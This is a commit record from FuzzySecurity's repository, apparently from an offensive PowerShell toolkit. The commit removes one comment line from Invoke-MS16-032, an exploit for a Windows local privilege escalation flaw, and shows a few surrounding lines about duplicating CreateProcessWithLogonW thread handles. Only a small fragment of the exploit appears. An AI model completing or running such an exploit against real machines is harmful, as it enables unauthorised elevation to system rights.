MS16-032 fix faster/100% reliable

This commit is contained in:
FuzzySecurity
2016-07-12 23:07:40 +01:00
parent ee6f2d2887
commit c2428f4bbf
-1
View File
@@ -275,7 +275,6 @@ function Invoke-MS16-032 {
}
echo "[>] Duplicating CreateProcessWithLogonW handle"
# Loop Get-ThreadHandle and collect thread handles with a valid TID
$hThread = Get-ThreadHandle
# If no thread handle is captured, the box is patched